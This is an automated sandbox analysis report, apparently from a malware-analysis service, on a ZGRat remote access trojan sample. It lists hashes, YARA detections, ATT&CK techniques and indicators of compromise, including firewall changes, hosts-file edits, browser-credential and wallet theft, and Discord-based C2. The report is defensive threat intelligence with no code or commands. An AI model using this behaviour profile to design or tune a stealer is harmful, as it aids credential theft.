zgrat | 47db9f504532cfd200b0d69837638fc81fa3c4c1b456356c8e50b5fc362b541b

Analysis

max time kernel
240s
max time network
243s
platform
windows10-2004_x64
resource
win10v2004-20240419-en
resource tags

arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
submitted
07-05-2024 19:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Adorins.exe
Size

6.7MB
MD5

0d5f5533ea48383187bbd56c0364a8b4
SHA1

a7e9276b6859f220dee17d4b33dd17e89e15dc30
SHA256

47db9f504532cfd200b0d69837638fc81fa3c4c1b456356c8e50b5fc362b541b
SHA512

367b6c6797d814f9a01ccc9b8befd399325613a745c52f1c2122f089b638d4674d724c3c12ae3ec5c67a45fd3e770f50575841c6d974768c71e9f24ca5d0b4e2
SSDEEP

196608:erQ6FSyqPheN/FJMIDJf0gsAGKgnFwRduAK4JmJO:ry3/Fqyf0gsznakAKi

Score

10^/10

zgrat discovery evasion execution rat spyware stealer upx

Malware Config

Signatures

Detect ZGRat V1 2 IoCs

resource	yara_rule
behavioral1/memory/5488-1278-0x0000018F7D9F0000-0x0000018F7DD72000-memory.dmp	family_zgrat_v1
behavioral1/memory/5796-1540-0x000001FD17770000-0x000001FD17AF2000-memory.dmp	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4876	powershell.exe
116	powershell.exe
612	powershell.exe
1572	powershell.exe
6120	powershell.exe
5540	powershell.exe
5156	powershell.exe
5084	powershell.exe
2392	powershell.exe
5960	powershell.exe
5448	powershell.exe
3068	powershell.exe

Drops file in Drivers directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Adorins.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Adorins.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1628	netsh.exe
4760	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation	FiddlerSetup.exe

Executes dropped EXE 10 IoCs

pid	Process
2272	bound.exe
4636	rar.exe
4168	FiddlerSetup.5.0.20242.10753-latest.exe
2812	FiddlerSetup.exe
3600	SetupHelper
5796	Fiddler.exe
3256	bound.exe
1552	rar.exe
3508	Fiddler.exe
5520	bound.exe

Loads dropped DLL 64 IoCs

pid	Process
1832	Adorins.exe
1832	Adorins.exe
1832	Adorins.exe
1832	Adorins.exe
1832	Adorins.exe
1832	Adorins.exe
1832	Adorins.exe
1832	Adorins.exe
1832	Adorins.exe
1832	Adorins.exe
1832	Adorins.exe
1832	Adorins.exe
1832	Adorins.exe
1832	Adorins.exe
1832	Adorins.exe
1832	Adorins.exe
1832	Adorins.exe
1832	Adorins.exe
2812	FiddlerSetup.exe
1508	mscorsvw.exe
2748	mscorsvw.exe
1080	mscorsvw.exe
2988	mscorsvw.exe
4068	mscorsvw.exe
4996	mscorsvw.exe
4068	mscorsvw.exe
5488	mscorsvw.exe
5488	mscorsvw.exe
5488	mscorsvw.exe
5488	mscorsvw.exe
5488	mscorsvw.exe
5224	mscorsvw.exe
5248	mscorsvw.exe
5892	mscorsvw.exe
5892	mscorsvw.exe
5796	mscorsvw.exe
5796	mscorsvw.exe
5892	mscorsvw.exe
5436	mscorsvw.exe
6000	mscorsvw.exe
5796	Fiddler.exe
4736	Adorins.exe
4736	Adorins.exe
4736	Adorins.exe
4736	Adorins.exe
4736	Adorins.exe
4736	Adorins.exe
4736	Adorins.exe
4736	Adorins.exe
4736	Adorins.exe
4736	Adorins.exe
4736	Adorins.exe
4736	Adorins.exe
4736	Adorins.exe
4736	Adorins.exe
4736	Adorins.exe
4736	Adorins.exe
4736	Adorins.exe
4736	Adorins.exe
1572	powershell.exe
4368	powershell.exe
6120	powershell.exe
5540	powershell.exe
2512	powershell.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0008000000023c48-63.dat	upx
behavioral1/memory/1832-67-0x00007FFEDB5C0000-0x00007FFEDBA2E000-memory.dmp	upx
behavioral1/files/0x000a000000023bc3-69.dat	upx
behavioral1/files/0x0008000000023c46-71.dat	upx
behavioral1/files/0x0008000000023c47-116.dat	upx
behavioral1/files/0x000a000000023bc5-124.dat	upx
behavioral1/files/0x000a000000023bc4-123.dat	upx
behavioral1/files/0x000a000000023bc6-125.dat	upx
behavioral1/files/0x000a000000023bc2-122.dat	upx
behavioral1/files/0x0008000000023c64-121.dat	upx
behavioral1/files/0x0008000000023c62-120.dat	upx
behavioral1/files/0x0008000000023c61-119.dat	upx
behavioral1/files/0x0008000000023c41-115.dat	upx
behavioral1/files/0x000a000000023bc8-127.dat	upx
behavioral1/files/0x000a000000023bc7-126.dat	upx
behavioral1/memory/1832-74-0x00007FFEF05A0000-0x00007FFEF05AF000-memory.dmp	upx
behavioral1/memory/1832-73-0x00007FFEEB0F0000-0x00007FFEEB114000-memory.dmp	upx
behavioral1/memory/1832-132-0x00007FFEE4FC0000-0x00007FFEE4FED000-memory.dmp	upx
behavioral1/memory/1832-133-0x00007FFEE8380000-0x00007FFEE8399000-memory.dmp	upx
behavioral1/memory/1832-134-0x00007FFEE1820000-0x00007FFEE183F000-memory.dmp	upx
behavioral1/memory/1832-135-0x00007FFEDAFD0000-0x00007FFEDB141000-memory.dmp	upx
behavioral1/memory/1832-136-0x00007FFEE1800000-0x00007FFEE1819000-memory.dmp	upx
behavioral1/memory/1832-137-0x00007FFEEA100000-0x00007FFEEA10D000-memory.dmp	upx
behavioral1/memory/1832-138-0x00007FFEE1150000-0x00007FFEE117E000-memory.dmp	upx
behavioral1/memory/1832-139-0x00007FFEDAF10000-0x00007FFEDAFC8000-memory.dmp	upx
behavioral1/memory/1832-141-0x00007FFEEB0F0000-0x00007FFEEB114000-memory.dmp	upx
behavioral1/memory/1832-140-0x00007FFEDB5C0000-0x00007FFEDBA2E000-memory.dmp	upx
behavioral1/memory/1832-142-0x00007FFEDAB90000-0x00007FFEDAF05000-memory.dmp	upx
behavioral1/memory/1832-144-0x00007FFEDA660000-0x00007FFEDA674000-memory.dmp	upx
behavioral1/memory/1832-145-0x00007FFEE4FB0000-0x00007FFEE4FBD000-memory.dmp	upx
behavioral1/memory/1832-147-0x00007FFEDA410000-0x00007FFEDA528000-memory.dmp	upx
behavioral1/memory/1832-194-0x00007FFEE1820000-0x00007FFEE183F000-memory.dmp	upx
behavioral1/memory/1832-326-0x00007FFEDAFD0000-0x00007FFEDB141000-memory.dmp	upx
behavioral1/memory/1832-350-0x00007FFEE1150000-0x00007FFEE117E000-memory.dmp	upx
behavioral1/memory/1832-342-0x00007FFEEB0F0000-0x00007FFEEB114000-memory.dmp	upx
behavioral1/memory/1832-356-0x00007FFEE1800000-0x00007FFEE1819000-memory.dmp	upx
behavioral1/memory/1832-352-0x00007FFEDAB90000-0x00007FFEDAF05000-memory.dmp	upx
behavioral1/memory/1832-355-0x00007FFEDA410000-0x00007FFEDA528000-memory.dmp	upx
behavioral1/memory/1832-351-0x00007FFEDAF10000-0x00007FFEDAFC8000-memory.dmp	upx
behavioral1/memory/1832-341-0x00007FFEDB5C0000-0x00007FFEDBA2E000-memory.dmp	upx
behavioral1/memory/1832-347-0x00007FFEDAFD0000-0x00007FFEDB141000-memory.dmp	upx
behavioral1/memory/1832-346-0x00007FFEE1820000-0x00007FFEE183F000-memory.dmp	upx
behavioral1/memory/1832-392-0x00007FFEDA410000-0x00007FFEDA528000-memory.dmp	upx
behavioral1/memory/1832-399-0x00007FFEE1800000-0x00007FFEE1819000-memory.dmp	upx
behavioral1/memory/1832-401-0x00007FFEE1150000-0x00007FFEE117E000-memory.dmp	upx
behavioral1/memory/1832-400-0x00007FFEEA100000-0x00007FFEEA10D000-memory.dmp	upx
behavioral1/memory/1832-398-0x00007FFEDAFD0000-0x00007FFEDB141000-memory.dmp	upx
behavioral1/memory/1832-397-0x00007FFEE1820000-0x00007FFEE183F000-memory.dmp	upx
behavioral1/memory/1832-396-0x00007FFEE8380000-0x00007FFEE8399000-memory.dmp	upx
behavioral1/memory/1832-395-0x00007FFEE4FC0000-0x00007FFEE4FED000-memory.dmp	upx
behavioral1/memory/1832-394-0x00007FFEEB0F0000-0x00007FFEEB114000-memory.dmp	upx
behavioral1/memory/1832-393-0x00007FFEF05A0000-0x00007FFEF05AF000-memory.dmp	upx
behavioral1/memory/1832-389-0x00007FFEDAB90000-0x00007FFEDAF05000-memory.dmp	upx
behavioral1/memory/1832-388-0x00007FFEDAF10000-0x00007FFEDAFC8000-memory.dmp	upx
behavioral1/memory/1832-378-0x00007FFEDB5C0000-0x00007FFEDBA2E000-memory.dmp	upx
behavioral1/memory/1832-391-0x00007FFEE4FB0000-0x00007FFEE4FBD000-memory.dmp	upx
behavioral1/memory/1832-390-0x00007FFEDA660000-0x00007FFEDA674000-memory.dmp	upx
behavioral1/memory/4736-1627-0x00007FFED6E50000-0x00007FFED72BE000-memory.dmp	upx
behavioral1/memory/4736-1628-0x00007FFEDB330000-0x00007FFEDB354000-memory.dmp	upx
behavioral1/memory/4736-1629-0x00007FFEEE030000-0x00007FFEEE03F000-memory.dmp	upx
behavioral1/memory/4736-1634-0x00007FFEDB300000-0x00007FFEDB32D000-memory.dmp	upx
behavioral1/memory/4736-1635-0x00007FFEDB1B0000-0x00007FFEDB1C9000-memory.dmp	upx
behavioral1/memory/4736-1636-0x00007FFEDA9D0000-0x00007FFEDA9EF000-memory.dmp	upx
behavioral1/memory/4736-1637-0x00007FFECD990000-0x00007FFECDB01000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
364	discord.com
365	discord.com
38	discord.com
39	discord.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
358	ip-api.com
362	ip-api.com
16	ip-api.com
36	ip-api.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe

Drops file in Windows directory 28 IoCs

description	ioc	Process
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\153c-0\System.EnterpriseServices.Wrapper.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runt19c51595#\6f69c2900b13ef16144a4dd218db8baf\System.Runtime.Caching.ni.dll.aux.tmp	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Ente96d83b35#\a4659c51384187894a071aa2b9d900e7\System.EnterpriseServices.ni.dll.aux.tmp	mscorsvw.exe
File opened for modification	C:\Windows\assembly\temp\OYYR420KCY\System.Web.ni.dll.aux	mscorsvw.exe
File opened for modification	C:\Windows\assembly\temp\ZYHU4796DM\Microsoft.JScript.ni.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\438-0\System.Numerics.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runt9064068c#\f85535a7092741215f67fdedf2846499\System.Runtime.Serialization.Formatters.Soap.ni.dll.aux.tmp	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\fe4-0\System.Deployment.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\5e4-0\EnableLoopback.exe	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.JScript\3b5383dd37da6f390d4d4ad42fcb5b32\Microsoft.JScript.ni.dll.aux.tmp	mscorsvw.exe
File opened for modification	C:\Windows\assembly\temp\OYYR420KCY\System.Web.ni.dll	mscorsvw.exe
File opened for modification	C:\Windows\assembly\temp\ZYHU4796DM\Microsoft.JScript.ni.dll.aux	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\bac-0\System.Data.SqlXml.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1384-0\System.Runtime.Serialization.Formatters.Soap.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1770-0\System.Runtime.Caching.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\153c-0\System.EnterpriseServices.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Security\7355af105ad86679d6c9070a9b4dc0c3\System.Security.ni.dll.aux.tmp	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1480-0\Microsoft.JScript.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1704-0\System.Web.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data.SqlXml\22b31f1b9eca85580b198424dd16a98a\System.Data.SqlXml.ni.dll.aux.tmp	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Web\44d302d3062a00a6bd5a39f743bdb4ef\System.Web.ni.dll.aux.tmp	mscorsvw.exe
File opened for modification	C:\Windows\assembly\temp\AKJM0CN56E\System.EnterpriseServices.ni.dll.aux	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Deployment\18271de25c06b49b2aaa391461de2df6\System.Deployment.ni.dll.aux.tmp	mscorsvw.exe
File opened for modification	C:\Windows\assembly\temp\AKJM0CN56E\System.EnterpriseServices.ni.dll	mscorsvw.exe
File opened for modification	C:\Windows\assembly\temp\AKJM0CN56E\System.EnterpriseServices.Wrapper.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\EnableLoopback\d12b539b25fd704b7b7ae29b10af66db\EnableLoopback.ni.exe.aux.tmp	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\abc-0\System.Security.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\ba90284a07d8bc0ce7e6273afa79210f\System.Numerics.ni.dll.aux.tmp	mscorsvw.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 10 IoCs

evasion

pid	Process
2608	timeout.exe
2104	timeout.exe
1312	timeout.exe
5480	timeout.exe
5836	timeout.exe
2112	timeout.exe
628	timeout.exe
3244	timeout.exe
2604	timeout.exe
1468	timeout.exe

Detects videocard installed 1 TTPs 8 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
6096	WMIC.exe
3160	WMIC.exe
3216	WMIC.exe
1056	WMIC.exe
5968	WMIC.exe
5852	WMIC.exe
2812	WMIC.exe
5908	WMIC.exe

Enumerates processes with tasklist 1 TTPs 17 IoCs

Process Discovery

T1057

pid	Process
5516	tasklist.exe
3548	tasklist.exe
2088	tasklist.exe
2372	tasklist.exe
4936	tasklist.exe
2256	tasklist.exe
1668	tasklist.exe
4000	tasklist.exe
2152	tasklist.exe
1980	tasklist.exe
2888	tasklist.exe
3396	tasklist.exe
396	tasklist.exe
4572	tasklist.exe
4948	tasklist.exe
5968	tasklist.exe
6084	tasklist.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers system information 1 TTPs 3 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2196	systeminfo.exe
5296	systeminfo.exe
2360	systeminfo.exe

Kills process with taskkill 22 IoCs

evasion

pid	Process
5252	taskkill.exe
4572	taskkill.exe
1904	taskkill.exe
5804	taskkill.exe
4476	taskkill.exe
3452	taskkill.exe
5644	taskkill.exe
5068	taskkill.exe
3708	taskkill.exe
5660	taskkill.exe
5540	taskkill.exe
5200	taskkill.exe
5616	taskkill.exe
5196	taskkill.exe
3284	taskkill.exe
2348	taskkill.exe
5276	taskkill.exe
4792	taskkill.exe
5936	taskkill.exe
932	taskkill.exe
4636	taskkill.exe
4364	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Fiddler.exe = "0"	FiddlerSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Fiddler.exe = "9999"	FiddlerSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION	FiddlerSetup.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133595849845495392"	chrome.exe

Modifies registry class 15 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000_Classes\Fiddler.ArchiveZip\Content Type = "application/vnd.telerik-fiddler.SessionArchive"	FiddlerSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000_Classes\Fiddler.ArchiveZip\Shell	FiddlerSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000_Classes\Fiddler.ArchiveZip\Shell\Open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Programs\\Fiddler\\Fiddler.exe\" -noattach \"%1\""	FiddlerSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000_Classes\Fiddler.ArchiveZip\Shell\Open &in Viewer\command	FiddlerSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000_Classes\Fiddler.ArchiveZip	FiddlerSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000_Classes\Fiddler.ArchiveZip\PerceivedType = "compressed"	FiddlerSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000_Classes\Fiddler.ArchiveZip\Shell\Open &in Viewer	FiddlerSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000_Classes\.saz	FiddlerSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000_Classes\.saz\ = "Fiddler.ArchiveZip"	FiddlerSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000_Classes\Fiddler.ArchiveZip\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Programs\\Fiddler\\SAZ.ico"	FiddlerSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000_Classes\Fiddler.ArchiveZip\Shell\Open\command	FiddlerSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000_Classes\Fiddler.ArchiveZip\Shell\Open	FiddlerSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000_Classes\Fiddler.ArchiveZip\ = "Fiddler Session Archive"	FiddlerSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000_Classes\Fiddler.ArchiveZip\DefaultIcon	FiddlerSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000_Classes\Fiddler.ArchiveZip\Shell\Open &in Viewer\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Programs\\Fiddler\\Fiddler.exe\" -viewer \"%1\""	FiddlerSetup.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3484	powershell.exe
3484	powershell.exe
5084	powershell.exe
5084	powershell.exe
3068	powershell.exe
3068	powershell.exe
3484	powershell.exe
5084	powershell.exe
3068	powershell.exe
2392	powershell.exe
2392	powershell.exe
4316	powershell.exe
4316	powershell.exe
4316	powershell.exe
4876	powershell.exe
4876	powershell.exe
4876	powershell.exe
4308	powershell.exe
4308	powershell.exe
4308	powershell.exe
1272	powershell.exe
1272	powershell.exe
3484	powershell.exe
3484	powershell.exe
3484	powershell.exe
3736	powershell.exe
3736	powershell.exe
3736	powershell.exe
3740	chrome.exe
3740	chrome.exe
2812	FiddlerSetup.exe
2812	FiddlerSetup.exe
5068	msedge.exe
5068	msedge.exe
2444	msedge.exe
2444	msedge.exe
6060	chrome.exe
6060	chrome.exe
6060	chrome.exe
6060	chrome.exe
5796	Fiddler.exe
5796	Fiddler.exe
5796	Fiddler.exe
5796	Fiddler.exe
5796	Fiddler.exe
5796	Fiddler.exe
5796	Fiddler.exe
5796	Fiddler.exe
5796	Fiddler.exe
5796	Fiddler.exe
5796	Fiddler.exe
5796	Fiddler.exe
5796	Fiddler.exe
5796	Fiddler.exe
5796	Fiddler.exe
5796	Fiddler.exe
5796	Fiddler.exe
5796	Fiddler.exe
5796	Fiddler.exe
5796	Fiddler.exe
5796	Fiddler.exe
5796	Fiddler.exe
5796	Fiddler.exe
5796	Fiddler.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs

pid	Process
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1728	WMIC.exe
Token: SeSecurityPrivilege	1728	WMIC.exe
Token: SeTakeOwnershipPrivilege	1728	WMIC.exe
Token: SeLoadDriverPrivilege	1728	WMIC.exe
Token: SeSystemProfilePrivilege	1728	WMIC.exe
Token: SeSystemtimePrivilege	1728	WMIC.exe
Token: SeProfSingleProcessPrivilege	1728	WMIC.exe
Token: SeIncBasePriorityPrivilege	1728	WMIC.exe
Token: SeCreatePagefilePrivilege	1728	WMIC.exe
Token: SeBackupPrivilege	1728	WMIC.exe
Token: SeRestorePrivilege	1728	WMIC.exe
Token: SeShutdownPrivilege	1728	WMIC.exe
Token: SeDebugPrivilege	1728	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1728	WMIC.exe
Token: SeRemoteShutdownPrivilege	1728	WMIC.exe
Token: SeUndockPrivilege	1728	WMIC.exe
Token: SeManageVolumePrivilege	1728	WMIC.exe
Token: 33	1728	WMIC.exe
Token: 34	1728	WMIC.exe
Token: 35	1728	WMIC.exe
Token: 36	1728	WMIC.exe
Token: SeDebugPrivilege	2888	tasklist.exe
Token: SeDebugPrivilege	3484	powershell.exe
Token: SeDebugPrivilege	5084	powershell.exe
Token: SeDebugPrivilege	3068	powershell.exe
Token: SeIncreaseQuotaPrivilege	1728	WMIC.exe
Token: SeSecurityPrivilege	1728	WMIC.exe
Token: SeTakeOwnershipPrivilege	1728	WMIC.exe
Token: SeLoadDriverPrivilege	1728	WMIC.exe
Token: SeSystemProfilePrivilege	1728	WMIC.exe
Token: SeSystemtimePrivilege	1728	WMIC.exe
Token: SeProfSingleProcessPrivilege	1728	WMIC.exe
Token: SeIncBasePriorityPrivilege	1728	WMIC.exe
Token: SeCreatePagefilePrivilege	1728	WMIC.exe
Token: SeBackupPrivilege	1728	WMIC.exe
Token: SeRestorePrivilege	1728	WMIC.exe
Token: SeShutdownPrivilege	1728	WMIC.exe
Token: SeDebugPrivilege	1728	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1728	WMIC.exe
Token: SeRemoteShutdownPrivilege	1728	WMIC.exe
Token: SeUndockPrivilege	1728	WMIC.exe
Token: SeManageVolumePrivilege	1728	WMIC.exe
Token: 33	1728	WMIC.exe
Token: 34	1728	WMIC.exe
Token: 35	1728	WMIC.exe
Token: 36	1728	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3160	WMIC.exe
Token: SeSecurityPrivilege	3160	WMIC.exe
Token: SeTakeOwnershipPrivilege	3160	WMIC.exe
Token: SeLoadDriverPrivilege	3160	WMIC.exe
Token: SeSystemProfilePrivilege	3160	WMIC.exe
Token: SeSystemtimePrivilege	3160	WMIC.exe
Token: SeProfSingleProcessPrivilege	3160	WMIC.exe
Token: SeIncBasePriorityPrivilege	3160	WMIC.exe
Token: SeCreatePagefilePrivilege	3160	WMIC.exe
Token: SeBackupPrivilege	3160	WMIC.exe
Token: SeRestorePrivilege	3160	WMIC.exe
Token: SeShutdownPrivilege	3160	WMIC.exe
Token: SeDebugPrivilege	3160	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3160	WMIC.exe
Token: SeRemoteShutdownPrivilege	3160	WMIC.exe
Token: SeUndockPrivilege	3160	WMIC.exe
Token: SeManageVolumePrivilege	3160	WMIC.exe
Token: 33	3160	WMIC.exe

Suspicious use of FindShellTrayWindow 61 IoCs

pid	Process
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe

Suspicious use of SendNotifyMessage 48 IoCs

pid	Process
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe
2444	msedge.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
5796	Fiddler.exe
5796	Fiddler.exe
3508	Fiddler.exe
3508	Fiddler.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1964 wrote to memory of 1832	1964	Adorins.exe	83
PID 1964 wrote to memory of 1832	1964	Adorins.exe	83
